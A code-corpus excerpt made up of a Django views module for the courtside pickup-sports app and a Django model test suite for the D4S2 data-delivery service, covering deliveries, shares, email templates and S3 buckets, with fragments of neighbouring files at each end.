        return int.from_bytes(val, 'big')
    if isinstance(val, str):
        return int(val)
    return val
def to_none_if_empty(val):
    """Map the empty string to None; everything else passes through."""
    return None if val == '' else val
courtside/game/views.py | alok102singh/courtside | 49 | 12764993 | <gh_stars>10-100
from datetime import datetime
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from forms.forms import GameForm
from game.models import Player, Sport, Game
def about(request):
    """Render the static about page."""
    return render(request, 'about.html')
def home(request):
    """Render the landing page, admin redirect, or user profile.

    Anonymous visitors see the index page listing all active games per sport;
    staff members are redirected to the Django admin; everyone else sees
    their profile with the games they own or have joined.
    """
    if not request.user.is_authenticated():
        # One queryset of active games per supported sport, keyed by the
        # context names the index template expects (replaces five
        # copy-pasted filter calls).
        context = {
            name: Game.objects.filter(sport=Sport.objects.get(sport=name), active="true")
            for name in ('soccer', 'hockey', 'basketball', 'baseball', 'volleyball')
        }
        return render(request, 'index.html', context)

    if request.user.is_staff:
        return HttpResponseRedirect('/admin/')

    player = Player.objects.get(user=request.user)
    sports = player.sports.all()
    joined_games = player.game_set.all()
    my_games = Game.objects.filter(owner=request.user)
    profile_pic_url = player.image_url
    return render(request, 'profile.html', {'player': player, 'profile_pic_url': profile_pic_url, 'sports': sports, 'games': my_games | joined_games})
@login_required(login_url='/login/')
def create(request):
    """ User will create games.

    On GET, renders an empty GameForm. On valid POST, persists a new Game
    owned by the current user and redirects to its detail page; an invalid
    POST re-renders the bound form with errors.

    Keyword arguments:
    request -
    """
    if request.method == 'POST':
        form = GameForm(request.POST)
        if form.is_valid():
            sport = Sport.objects.get(sport=form.cleaned_data['sport'])
            #player = Player.objects.get(user=request.user) # unused var
            game = Game()
            game.sport = sport
            game.owner = request.user
            # Combine the separate date and time form fields into one datetime.
            game.start_date_and_time = datetime.combine(form.cleaned_data['start_date'], form.cleaned_data['start_time'])
            game.address = form.cleaned_data['address']
            game.minimum_players = form.cleaned_data['minimum_players']
            game.restrictions = form.cleaned_data['restrictions']
            game.active = True
            # Coordinates are posted outside the form (presumably by a map
            # widget); only stored when both are non-empty. NOTE(review):
            # request.POST['lng'] raises KeyError if absent -- confirm the
            # client always posts both keys.
            if request.POST['lng'] and request.POST['lat']:
                game.longitude = request.POST['lng']
                game.latitude = request.POST['lat']
            game.save()
            return HttpResponseRedirect('/game/%s/' % game.id)
    else:
        form = GameForm()
    return render(request, 'create.html', {'form': form})
def game(request, id):
    """Render the detail page for a single game.

    NOTE: the parameter name `id` shadows the builtin of the same name.
    """
    game = get_object_or_404(Game, pk=id)
    owner = Player.objects.get(user=game.owner)
    players = game.players.all()
    # +1 For the owner
    number_of_players = len(players) + 1
    joined = False
    if request.user.is_authenticated():
        current_player = Player.objects.get(user=request.user)
        current_games = current_player.game_set.all()
        if game in current_games:
            joined = True
    else:
        current_player = None
    # Lowercased sport name attached for template display only; the change is
    # never saved to the database.
    game.sport.name = game.sport.sport.lower()
    return render(request, 'game.html',
                  {'game': game,
                   'players': players,
                   'current_player': current_player,
                   'joined': joined,
                   'number_of_players': number_of_players,
                   'owner': owner,
                   'timezone': 'US/Eastern'}
                  )
@login_required(login_url='/login/')
def join(request, game_id):
    """Add the current user's player to the game's roster, then redirect back."""
    target_game = get_object_or_404(Game, pk=game_id)
    current_player = Player.objects.get(user=request.user)
    target_game.players.add(current_player)
    return HttpResponseRedirect('/game/%s/' % game_id)
@login_required(login_url='/login/')
def leave(request, game_id):
    """Remove the current user's player from the game's roster, then redirect back."""
    target_game = get_object_or_404(Game, pk=game_id)
    current_player = Player.objects.get(user=request.user)
    target_game.players.remove(current_player)
    return HttpResponseRedirect('/game/%s/' % game_id)
@login_required(login_url='/login/')
def delete(request, game_id):
    """Delete a game; only its owner may do so."""
    target_game = get_object_or_404(Game, pk=game_id)
    if request.user != target_game.owner:
        # Non-owners are bounced back to the game page unchanged.
        return HttpResponseRedirect('/game/%s/' % game_id)
    target_game.players.clear()
    target_game.delete()
    return HttpResponseRedirect('/')
@login_required(login_url='/login/')
def search(request):
    """Render the game search page.

    Supplies all active games grouped by sport, plus a flag dict of the
    sports the current player follows.
    """
    player = Player.objects.get(user=request.user)
    sports = {sport.sport: True for sport in player.sports.all()}
    # One queryset of active games per supported sport (replaces five
    # copy-pasted filter calls); keys match what the search template expects.
    games = {
        name: Game.objects.filter(sport=Sport.objects.get(sport=name), active="true")
        for name in ('soccer', 'volleyball', 'baseball', 'hockey', 'basketball')
    }
    return render(request, 'search.html', {'games': games, 'sports': sports})
| 2.5 | 2 |
d4s2_api/tests_models.py | Duke-GCB/D4S2 | 0 | 12764994 | <filename>d4s2_api/tests_models.py
from django.db import IntegrityError
from django.core import serializers
from django.test import TestCase
from d4s2_api.models import *
from django.contrib.auth.models import User
import datetime
class TransferBaseTestCase(TestCase):
    """Base test case providing a shared DDS transfer id for transfer-model tests."""

    def setUp(self):
        # Arbitrary but stable transfer identifier reused by subclasses.
        self.transfer_id = 'abcd-1234-efgh-6789'
class DeliveryTestCase(TransferBaseTestCase):
    """Tests for the DDSDelivery model: state machine, share users, messages."""

    DELIVERY_EMAIL_TEXT = 'delivery email message'
    SENDER_COMPLETE_EMAIL_TEXT = 'sender delivery accepted'
    RECIPIENT_COMPLETE_EMAIL_TEXT = 'recipient delivery accepted'
    DECLINE_EMAIL_TEXT = 'delivery declined'

    def setUp(self):
        super(DeliveryTestCase, self).setUp()
        self.email_template_set = EmailTemplateSet.objects.create(name='someset')
        # A baseline delivery that most tests fetch via DDSDelivery.objects.first().
        DDSDelivery.objects.create(project_id='project1',
                                   from_user_id='user1',
                                   to_user_id='user2',
                                   transfer_id=self.transfer_id,
                                   email_template_set=self.email_template_set)

    def test_initial_state(self):
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.state, State.NEW, 'New deliveries should be in initiated state')
        self.assertEqual(delivery.project_name, '')

    def test_required_fields(self):
        with self.assertRaises(IntegrityError):
            DDSDelivery.objects.create(project_id=None, from_user_id=None, to_user_id=None, transfer_id=None)

    def test_prohibits_duplicates(self):
        # Same project/users/transfer combination must violate a unique constraint.
        with self.assertRaises(IntegrityError):
            DDSDelivery.objects.create(project_id='project1',
                                       from_user_id='user1',
                                       to_user_id='user2',
                                       transfer_id=self.transfer_id)

    def test_can_add_share_users(self):
        delivery = DDSDelivery.objects.create(project_id='projectA',
                                              from_user_id='user1',
                                              to_user_id='user2',
                                              transfer_id='123-123',
                                              email_template_set=self.email_template_set)
        DDSDeliveryShareUser.objects.create(delivery=delivery, dds_id='user3')
        DDSDeliveryShareUser.objects.create(delivery=delivery, dds_id='user4')
        share_users = delivery.share_users.all()
        self.assertEqual(set([share_user.dds_id for share_user in share_users]),
                         set(['user3', 'user4']))

    def test_user_can_be_shared_multiple_deliveries(self):
        delivery1 = DDSDelivery.objects.create(project_id='projectA',
                                               from_user_id='user1',
                                               to_user_id='user2',
                                               transfer_id='123-123',
                                               email_template_set=self.email_template_set)
        delivery2 = DDSDelivery.objects.create(project_id='projectB',
                                               from_user_id='user3',
                                               to_user_id='user4',
                                               transfer_id='456-789',
                                               email_template_set=self.email_template_set)
        # The same dds user may appear as share user on different deliveries.
        DDSDeliveryShareUser.objects.create(delivery=delivery1, dds_id='user3')
        DDSDeliveryShareUser.objects.create(delivery=delivery2, dds_id='user3')
        self.assertEqual(DDSDeliveryShareUser.objects.count(), 2)
        self.assertEqual(set([share_user.dds_id for share_user in DDSDeliveryShareUser.objects.all()]),
                         set(['user3']))

    def test_user_cannot_be_shared_delivery_twice(self):
        delivery = DDSDelivery.objects.create(project_id='projectA',
                                              from_user_id='user1',
                                              to_user_id='user2',
                                              transfer_id='123-123',
                                              email_template_set=self.email_template_set)
        DDSDeliveryShareUser.objects.create(delivery=delivery, dds_id='user3')
        with self.assertRaises(IntegrityError):
            DDSDeliveryShareUser.objects.create(delivery=delivery, dds_id='user3')

    def test_mark_notified(self):
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.state, State.NEW)
        delivery.mark_notified(DeliveryTestCase.DELIVERY_EMAIL_TEXT)
        self.assertEqual(delivery.state, State.NOTIFIED)

    def test_mark_accepted(self):
        performed_by = 'performer'
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.state, State.NEW)
        delivery.project_name = 'MouseRNA'
        delivery.mark_accepted(performed_by, DeliveryTestCase.SENDER_COMPLETE_EMAIL_TEXT)
        self.assertEqual(delivery.state, State.ACCEPTED)
        self.assertEqual(delivery.performed_by, performed_by)
        self.assertEqual(delivery.sender_completion_email_text, DeliveryTestCase.SENDER_COMPLETE_EMAIL_TEXT)
        # Recipient email text defaults to empty when not supplied.
        self.assertEqual(delivery.recipient_completion_email_text, '')
        self.assertEqual(delivery.project_name, 'MouseRNA')

    def test_mark_accepted_with_recipient_email(self):
        performed_by = 'performer'
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.state, State.NEW)
        delivery.mark_accepted(performed_by,
                               DeliveryTestCase.SENDER_COMPLETE_EMAIL_TEXT,
                               DeliveryTestCase.RECIPIENT_COMPLETE_EMAIL_TEXT)
        self.assertEqual(delivery.state, State.ACCEPTED)
        self.assertEqual(delivery.performed_by, performed_by)
        self.assertEqual(delivery.sender_completion_email_text, DeliveryTestCase.SENDER_COMPLETE_EMAIL_TEXT)
        self.assertEqual(delivery.recipient_completion_email_text, DeliveryTestCase.RECIPIENT_COMPLETE_EMAIL_TEXT)

    def test_mark_declined(self):
        performed_by = 'performer'
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.state, State.NEW)
        delivery.mark_declined(performed_by, 'Wrong person.', DeliveryTestCase.DECLINE_EMAIL_TEXT)
        self.assertEqual(delivery.state, State.DECLINED)
        self.assertEqual(delivery.decline_reason, 'Wrong person.')
        self.assertEqual(delivery.performed_by, performed_by)
        self.assertEqual(delivery.sender_completion_email_text, DeliveryTestCase.DECLINE_EMAIL_TEXT)

    def test_is_complete(self):
        # is_complete() becomes True only for terminal states
        # (accepted/declined/failed/canceled), not for new/notified.
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.is_complete(), False)
        delivery.mark_notified('')
        self.assertEqual(delivery.is_complete(), False)
        delivery.mark_accepted('', '', '')
        self.assertEqual(delivery.is_complete(), True)
        delivery.mark_declined('', '', '')
        self.assertEqual(delivery.is_complete(), True)
        delivery.state = State.FAILED
        delivery.save()
        self.assertEqual(delivery.is_complete(), True)
        delivery.mark_canceled()
        self.assertEqual(delivery.is_complete(), True)

    def test_mark_transferring(self):
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.state, State.NEW)
        delivery.mark_transferring()
        self.assertEqual(delivery.state, State.TRANSFERRING)
        delivery.mark_failed()
        self.assertEqual(delivery.state, State.FAILED)
        # A failed delivery can be retried (moved back to transferring).
        delivery.mark_transferring()
        self.assertEqual(delivery.state, State.TRANSFERRING)
        # NOTE(review): the result of this final call is never asserted --
        # this looks like an unfinished test step.
        delivery.mark_accepted('', '', '')

    def test_mark_failed(self):
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.state, State.NEW)
        delivery.mark_failed()
        self.assertEqual(delivery.state, State.FAILED)

    def setup_incomplete_delivery(self):
        # Helper (not a test): returns the baseline delivery, still incomplete.
        delivery = DDSDelivery.objects.first()
        delivery.transfer_id = self.transfer_id
        delivery.save()
        self.assertFalse(delivery.is_complete())
        return delivery

    def test_user_message(self):
        delivery = DDSDelivery.objects.first()
        self.assertIsNone(delivery.user_message)
        user_message = 'This is the final result of analysis xyz123'
        delivery.user_message = user_message
        delivery.save()
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.user_message, user_message)

    def test_mark_canceled(self):
        delivery = DDSDelivery.objects.first()
        self.assertEqual(delivery.state, State.NEW)
        delivery.mark_canceled()
        self.assertEqual(delivery.state, State.CANCELED)
class ShareTestCase(TransferBaseTestCase):
    """Tests for the Share model: defaults, uniqueness per role, messages."""

    def setUp(self):
        super(ShareTestCase, self).setUp()
        self.email_template_set = EmailTemplateSet.objects.create(name='someset')
        Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2',
                             email_template_set=self.email_template_set)

    def test_initial_state(self):
        share = Share.objects.first()
        self.assertEqual(share.state, State.NEW, 'New shares should be in initiated state')
        self.assertEqual(share.role, ShareRole.DEFAULT, 'New shares should have default role')

    def test_prohibits_duplicates(self):
        # Same project/users/role combination must violate a unique constraint.
        with self.assertRaises(IntegrityError):
            Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2',
                                 email_template_set=self.email_template_set)

    def test_allows_multiple_shares(self):
        # Different recipient -> allowed.
        d = Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user3',
                                 email_template_set=self.email_template_set)
        self.assertIsNotNone(d)

    def test_allows_multiple_shares_different_roles(self):
        # Same users but different roles -> both allowed.
        v = Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2', role=ShareRole.VIEW,
                                 email_template_set=self.email_template_set)
        d = Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2', role=ShareRole.EDIT,
                                 email_template_set=self.email_template_set)
        self.assertIsNotNone(v)
        self.assertIsNotNone(d)
        self.assertNotEqual(v, d)

    def test_user_message(self):
        share = Share.objects.first()
        self.assertIsNone(share.user_message)
        user_message = 'This is the preliminary result of analysis xyz123'
        share.user_message = user_message
        share.save()
        share = Share.objects.first()
        self.assertEqual(share.user_message, user_message)

    def test_email_template_name(self):
        share = Share.objects.create(project_id='project1', from_user_id='user1', to_user_id='user2',
                                     role=ShareRole.VIEW, email_template_set=self.email_template_set)
        self.assertEqual(share.email_template_name(), 'share_project_viewer')
class EmailTemplateTypeTestCase(TestCase):
    """Tests for EmailTemplateType uniqueness and migration-loaded fixtures."""

    def test_requires_unique_types(self):
        # FIX: renamed from `requires_unique_types` -- without the `test_`
        # prefix the unittest runner silently skipped this check.
        EmailTemplateType.objects.create(name='type1')
        with self.assertRaises(IntegrityError):
            EmailTemplateType.objects.create(name='type1')

    def test_initial_data(self):
        """
        Data for this is loaded by a migration, make sure it's there.
        :return:
        """
        for role in ShareRole.ROLES:
            self.assertIsNotNone(EmailTemplateType.objects.get(name='share_{}'.format(role)))
        self.assertIsNotNone(EmailTemplateType.objects.get(name='delivery'))
        self.assertIsNotNone(EmailTemplateType.objects.get(name='accepted'))
        self.assertIsNotNone(EmailTemplateType.objects.get(name='declined'))
class EmailTemplateTestCase(TestCase):
    """Tests for EmailTemplate uniqueness per set/type and template lookup."""

    def setUp(self):
        # email templates depend on groups and users
        self.template_set = EmailTemplateSet.objects.create(name='template_set')
        self.user = User.objects.create(username='test_user')
        self.other_user = User.objects.create(username='other_user')
        UserEmailTemplateSet.objects.create(user=self.user, email_template_set=self.template_set)
        self.user_dds_id = 'user1'
        self.default_type = EmailTemplateType.objects.get(name=ShareRole.email_template_name(ShareRole.DEFAULT))
        self.download_type = EmailTemplateType.objects.get(name=ShareRole.email_template_name(ShareRole.DOWNLOAD))
        self.view_type = EmailTemplateType.objects.get(name=ShareRole.email_template_name(ShareRole.VIEW))
        self.transfer_id = 'abc-123'

    def test_create_email_template(self):
        template = EmailTemplate.objects.create(template_set=self.template_set,
                                                owner=self.user,
                                                template_type=self.default_type,
                                                subject='Subject',
                                                body='email body')
        self.assertIsNotNone(template)

    def test_prevent_duplicate_types(self):
        # Only one template per (template_set, template_type) is allowed.
        template1 = EmailTemplate.objects.create(template_set=self.template_set,
                                                 owner=self.user,
                                                 template_type=self.download_type,
                                                 subject='Subject',
                                                 body='email body 1')
        self.assertIsNotNone(template1)
        with self.assertRaises(IntegrityError):
            EmailTemplate.objects.create(template_set=self.template_set,
                                         owner=self.user,
                                         template_type=self.download_type,
                                         subject='Subject',
                                         body='email body 2')

    # NOTE(review): "outspide" is a typo for "outside"; fixing it means
    # renaming a test method, deferred to keep this change doc-only.
    def test_allows_duplicate_types_outspide_group(self):
        template_set2 = EmailTemplateSet.objects.create(name='template_set2')
        template1 = EmailTemplate.objects.create(template_set=self.template_set,
                                                 owner=self.user,
                                                 template_type=self.download_type,
                                                 subject='Subject',
                                                 body='email body 1')
        self.assertIsNotNone(template1)
        template2 = EmailTemplate.objects.create(template_set=template_set2,
                                                 owner=self.user,
                                                 template_type=self.download_type,
                                                 subject='Subject',
                                                 body='email body 1')
        # assert different items but otherwise data is the same
        self.assertIsNotNone(template2)
        self.assertNotEqual(template1, template2)
        self.assertEqual(template1.owner, template2.owner)
        self.assertEqual(template1.subject, template2.subject)
        self.assertEqual(template1.body, template2.body)
        self.assertEqual(template1.template_type, template2.template_type)
        self.assertNotEqual(template1.template_set, template2.template_set)

    def test_template_for_name(self):
        download_template = EmailTemplate.objects.create(template_set=self.template_set,
                                                         owner=self.user,
                                                         template_type=self.download_type,
                                                         subject='Subject',
                                                         body='email body 1')
        view_template = EmailTemplate.objects.create(template_set=self.template_set,
                                                     owner=self.user,
                                                     template_type=self.view_type,
                                                     subject='Subject',
                                                     body='email body 1')
        template_name = ShareRole.email_template_name(ShareRole.DOWNLOAD)
        self.assertEqual(self.template_set.template_for_name(template_name), download_template)
        template_name = ShareRole.email_template_name(ShareRole.VIEW)
        self.assertEqual(self.template_set.template_for_name(template_name), view_template)
class EmailTemplateSetTestCase(TestCase):
    """Tests for EmailTemplateSet reply/cc address defaults and validation.

    NOTE(review): the '<EMAIL>' literals below look like sanitized
    placeholders from source redaction -- they should be real address
    strings; confirm against upstream history.
    """

    def setUp(self):
        self.template_name = 'Test Template'

    def test_defaults_blank_reply_cc_addresses(self):
        template_set = EmailTemplateSet.objects.create(name=self.template_name)
        self.assertIsNotNone(template_set)
        self.assertEqual(template_set.reply_address, '')
        self.assertEqual(template_set.cc_address, '')

    def test_raises_invalid_reply_address(self):
        template_set = EmailTemplateSet.objects.create(name=self.template_name,
                                                       reply_address='not-an-email-address')
        with self.assertRaisesMessage(ValidationError, "{'reply_address': ['Enter a valid email address.']}"):
            template_set.clean_fields()

    def test_valid_reply_address(self):
        template_set = EmailTemplateSet.objects.create(name=self.template_name,
                                                       reply_address='<EMAIL>')
        template_set.clean_fields()
        self.assertEqual(template_set.reply_address, '<EMAIL>')

    def test_raises_invalid_cc_address(self):
        template_set = EmailTemplateSet.objects.create(name=self.template_name,
                                                       cc_address='not-an-email-address')
        with self.assertRaisesMessage(ValidationError, "{'cc_address': ['Enter a valid email address.']}"):
            template_set.clean_fields()

    def test_valid_cc_address(self):
        template_set = EmailTemplateSet.objects.create(name=self.template_name,
                                                       cc_address='<EMAIL>')
        template_set.clean_fields()
        self.assertEqual(template_set.cc_address, '<EMAIL>')
class S3EndpointTestCase(TestCase):
    """Tests for the S3Endpoint model and its natural-key deserialization."""

    def test_create_and_read(self):
        s3_url = 'https://s3service.com/'
        S3Endpoint.objects.create(url=s3_url)
        s3_endpoints = S3Endpoint.objects.all()
        self.assertEqual(len(s3_endpoints), 1)
        self.assertEqual(s3_endpoints[0].url, s3_url)

    def test_deserialization_with_get_by_natural_key(self):
        # Fixture JSON omits the primary key, so loading relies on the
        # model manager's natural-key support.
        s3_endpoint_json_ary = '[{"model": "d4s2_api.s3endpoint", "fields": {"url": "https://s3.com/"}}]'
        s3_endpoint_list = list(serializers.deserialize("json", s3_endpoint_json_ary))
        self.assertEqual(len(s3_endpoint_list), 1)
        s3_endpoint_list[0].save()
        s3_endpoints = S3Endpoint.objects.all()
        self.assertEqual(len(s3_endpoints), 1)
        self.assertEqual(s3_endpoints[0].url, "https://s3.com/")
class S3UserTestCase(TestCase):
    """Tests for the S3User model: types, per-endpoint uniqueness."""

    def setUp(self):
        self.user1 = User.objects.create(username='user1')
        self.user2 = User.objects.create(username='user2')

    def test_create_and_read(self):
        endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
        s3_user1 = S3User.objects.create(endpoint=endpoint,
                                         s3_id='user1_s3_id',
                                         user=self.user1)
        # Type defaults to NORMAL when not specified.
        self.assertEqual(s3_user1.type, S3UserTypes.NORMAL)
        self.assertEqual(s3_user1.get_type_label(), 'Normal')
        s3_user2 = S3User.objects.create(endpoint=endpoint,
                                         s3_id='user1_s3_id',
                                         user=self.user2,
                                         type=S3UserTypes.AGENT)
        self.assertEqual(s3_user2.type, S3UserTypes.AGENT)
        self.assertEqual(s3_user2.get_type_label(), 'Agent')
        s3_users = S3User.objects.order_by('s3_id')
        self.assertEqual(len(s3_users), 2)
        self.assertEqual([s3_user.s3_id for s3_user in s3_users],
                         ['user1_s3_id', 'user1_s3_id'])

    # NOTE(review): "endoint" is a typo for "endpoint"; fixing it means
    # renaming a test method, deferred to keep this change doc-only.
    def test_duplicating_endoint_and_user(self):
        # One django user can have multiple S3Users as long as the endpoints are different
        endpoint1 = S3Endpoint.objects.create(url='https://s3service1.com/', name='primary')
        endpoint2 = S3Endpoint.objects.create(url='https://s3service2.com/', name='secondary')
        S3User.objects.create(endpoint=endpoint1, s3_id='user1_s3_id', user=self.user1)
        S3User.objects.create(endpoint=endpoint2, s3_id='user1_s3_2id', user=self.user1)
        with self.assertRaises(IntegrityError):
            S3User.objects.create(endpoint=endpoint1, s3_id='user1_s3_3id', user=self.user1)

    def test_endpoint_name_must_be_unique(self):
        # NOTE(review): the comment below was copy-pasted from the previous
        # test; this one actually checks endpoint name uniqueness.
        # One django user can have multiple S3Users as long as the endpoints are different
        endpoint1 = S3Endpoint.objects.create(url='https://s3service1.com/', name='primary')
        with self.assertRaises(IntegrityError):
            S3Endpoint.objects.create(url='https://s3service2.com/', name='primary')
class S3UserCredentialTestCase(TestCase):
    """Tests for the one-to-one S3UserCredential model."""

    def setUp(self):
        self.user1 = User.objects.create(username='user1')
        self.endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
        self.s3_user1 = S3User.objects.create(endpoint=self.endpoint,
                                              s3_id='user1_s3_id',
                                              user=self.user1)

    def test_create_and_read(self):
        S3UserCredential.objects.create(s3_user=self.s3_user1, aws_secret_access_key='secret123')
        s3_user_credentials = S3UserCredential.objects.all()
        self.assertEqual(len(s3_user_credentials), 1)
        self.assertEqual(s3_user_credentials[0].aws_secret_access_key, 'secret123')
        self.assertEqual(s3_user_credentials[0].s3_user, self.s3_user1)

    def test_creating_multiple_credentials_for_one_user(self):
        # A second credential for the same S3 user must be rejected.
        S3UserCredential.objects.create(s3_user=self.s3_user1, aws_secret_access_key='secret123')
        with self.assertRaises(IntegrityError):
            S3UserCredential.objects.create(s3_user=self.s3_user1, aws_secret_access_key='secret124')
class S3BucketTestCase(TestCase):
    """Tests for S3Bucket creation and the (name, endpoint) uniqueness rule."""

    def setUp(self):
        self.user1 = User.objects.create(username='user1')
        self.endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
        self.s3_user1 = S3User.objects.create(
            endpoint=self.endpoint, s3_id='user1_s3_id', user=self.user1)

    def test_create_and_read(self):
        for bucket_name in ('mouse', 'mouse2', 'mouse3'):
            S3Bucket.objects.create(name=bucket_name, owner=self.s3_user1,
                                    endpoint=self.endpoint)
        names = [bucket.name for bucket in S3Bucket.objects.order_by('name')]
        self.assertEqual(len(names), 3)
        self.assertEqual(names, ['mouse', 'mouse2', 'mouse3'])

    def test_prevents_duplicate_name_endpoint(self):
        S3Bucket.objects.create(name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
        # Same bucket name on the same endpoint must be rejected.
        with self.assertRaises(IntegrityError):
            S3Bucket.objects.create(name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
class S3DeliveryCredentialTestCase(TestCase):
    """Tests for S3Delivery creation and the duplicate-delivery constraint."""

    def setUp(self):
        # Two S3 users on one endpoint and two buckets owned by the first user.
        self.email_template_set = EmailTemplateSet.objects.create(name='someset')
        self.user1 = User.objects.create(username='user1')
        self.user2 = User.objects.create(username='user2')
        self.endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
        self.s3_user1 = S3User.objects.create(
            endpoint=self.endpoint, s3_id='user1_s3_id', user=self.user1)
        self.s3_user2 = S3User.objects.create(
            endpoint=self.endpoint, s3_id='user2_s3_id', user=self.user2)
        self.s3_bucket = S3Bucket.objects.create(
            name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
        self.s3_bucket2 = S3Bucket.objects.create(
            name='mouse2', owner=self.s3_user1, endpoint=self.endpoint)

    def test_create_and_read(self):
        for bucket in (self.s3_bucket, self.s3_bucket2):
            S3Delivery.objects.create(bucket=bucket,
                                      from_user=self.s3_user1,
                                      to_user=self.s3_user2,
                                      email_template_set=self.email_template_set)
        bucket_names = [delivery.bucket.name
                        for delivery in S3Delivery.objects.order_by('bucket__name')]
        self.assertEqual(bucket_names, ['mouse', 'mouse2'])

    def test_prevents_creating_same_delivery_twice(self):
        S3Delivery.objects.create(bucket=self.s3_bucket,
                                  from_user=self.s3_user1,
                                  to_user=self.s3_user2,
                                  email_template_set=self.email_template_set)
        # An identical (bucket, from, to) delivery must be rejected.
        with self.assertRaises(IntegrityError):
            S3Delivery.objects.create(bucket=self.s3_bucket,
                                      from_user=self.s3_user1,
                                      to_user=self.s3_user2,
                                      email_template_set=self.email_template_set)
class DDSDeliveryErrorTestCase(TestCase):
    """Tests for DDSDeliveryError records and their reverse relation."""

    def setUp(self):
        self.email_template_set = EmailTemplateSet.objects.create(name='someset')
        self.delivery1 = DDSDelivery.objects.create(
            project_id='project1', from_user_id='user1', to_user_id='user2',
            transfer_id='transfer1', email_template_set=self.email_template_set)
        self.delivery2 = DDSDelivery.objects.create(
            project_id='project2', from_user_id='user2', to_user_id='user3',
            transfer_id='transfer2', email_template_set=self.email_template_set)

    def test_create_errors(self):
        DDSDeliveryError.objects.create(message='Something failed', delivery=self.delivery1)
        DDSDeliveryError.objects.create(message='Other failed', delivery=self.delivery1)
        errors = DDSDeliveryError.objects.order_by('message')
        self.assertEqual(len(errors), 2)
        # Ordered by message: 'Other failed' sorts before 'Something failed'.
        self.assertEqual([error.message for error in errors],
                         ['Other failed', 'Something failed'])
        for error in errors:
            # Creation timestamp is auto-populated.
            self.assertIsNotNone(error.created)
            self.assertEqual(type(error.created), datetime.datetime)

    def test_read_via_delivery_errors(self):
        DDSDeliveryError.objects.create(message='Error1', delivery=self.delivery1)
        DDSDeliveryError.objects.create(message='Error2', delivery=self.delivery1)
        DDSDeliveryError.objects.create(message='Error3OtherDelivery', delivery=self.delivery2)
        # The reverse relation only returns errors belonging to this delivery.
        errors = self.delivery1.errors.order_by('message')
        self.assertEqual(len(errors), 2)
        self.assertEqual([error.message for error in errors], ['Error1', 'Error2'])
class S3DeliveryBaseTestCase(TestCase):
    """Shared fixture: two S3 users on one endpoint, two buckets, two deliveries."""

    def setUp(self):
        self.email_template_set = EmailTemplateSet.objects.create(name='someset')
        self.user1 = User.objects.create(username='user1')
        self.user2 = User.objects.create(username='user2')
        self.endpoint = S3Endpoint.objects.create(url='https://s3service.com/')
        self.s3_user1 = S3User.objects.create(
            endpoint=self.endpoint, s3_id='user1_s3_id', user=self.user1)
        self.s3_user2 = S3User.objects.create(
            endpoint=self.endpoint, s3_id='user2_s3_id', user=self.user2)
        self.s3_bucket = S3Bucket.objects.create(
            name='mouse', owner=self.s3_user1, endpoint=self.endpoint)
        self.s3_bucket2 = S3Bucket.objects.create(
            name='mouse2', owner=self.s3_user1, endpoint=self.endpoint)
        # One delivery per bucket, both from user1 to user2.
        self.delivery1 = S3Delivery.objects.create(
            bucket=self.s3_bucket, from_user=self.s3_user1, to_user=self.s3_user2,
            email_template_set=self.email_template_set)
        self.delivery2 = S3Delivery.objects.create(
            bucket=self.s3_bucket2, from_user=self.s3_user1, to_user=self.s3_user2,
            email_template_set=self.email_template_set)
class S3DeliveryErrorTestCase(S3DeliveryBaseTestCase):
    """Tests for S3DeliveryError records and their reverse relation."""

    def test_create_errors(self):
        S3DeliveryError.objects.create(message='Something failed', delivery=self.delivery1)
        S3DeliveryError.objects.create(message='Other failed', delivery=self.delivery1)
        errors = S3DeliveryError.objects.order_by('message')
        self.assertEqual(len(errors), 2)
        # Ordered by message: 'Other failed' sorts before 'Something failed'.
        self.assertEqual([error.message for error in errors],
                         ['Other failed', 'Something failed'])
        for error in errors:
            # Creation timestamp is auto-populated.
            self.assertIsNotNone(error.created)
            self.assertEqual(type(error.created), datetime.datetime)

    def test_read_via_delivery_errors(self):
        S3DeliveryError.objects.create(message='Error1', delivery=self.delivery1)
        S3DeliveryError.objects.create(message='Error2', delivery=self.delivery1)
        S3DeliveryError.objects.create(message='Error3OtherDelivery', delivery=self.delivery2)
        # The reverse relation only returns errors belonging to this delivery.
        errors = self.delivery1.errors.order_by('message')
        self.assertEqual(len(errors), 2)
        self.assertEqual([error.message for error in errors], ['Error1', 'Error2'])
class S3ObjectManifestTestCase(S3DeliveryBaseTestCase):
    """Tests attaching a JSON object manifest to an S3 delivery."""

    def test_create(self):
        object_manifest = S3ObjectManifest.objects.create(content=[{'state': 'good', 'value': 1}])
        # Fixed: removed stray statement-terminating semicolons.
        self.delivery1.manifest = object_manifest
        self.delivery1.save()

    def test_read(self):
        object_manifest = S3ObjectManifest.objects.create(content=[{'state': 'bad', 'value': 0}])
        self.delivery1.manifest = object_manifest
        self.delivery1.save()
        manifests = S3ObjectManifest.objects.all()
        self.assertEqual(len(manifests), 1)
        # The JSON content round-trips through the database unchanged.
        self.assertEqual(manifests[0].content, [{'state': 'bad', 'value': 0}])
class ShareRoleTestCase(TestCase):
    """Tests ShareRole's mapping from a role name to its email template name."""

    def test_email_template_name(self):
        # Template names are the role name prefixed with 'share_'.
        for role, expected in (('somerole', 'share_somerole'),
                               ('file_downloader', 'share_file_downloader')):
            self.assertEqual(ShareRole.email_template_name(role), expected)
| 2.609375 | 3 |
agrid/grid.py | TobbeTripitaka/grid | 15 | 12764995 | <filename>agrid/grid.py
#!/usr/bin/env python3
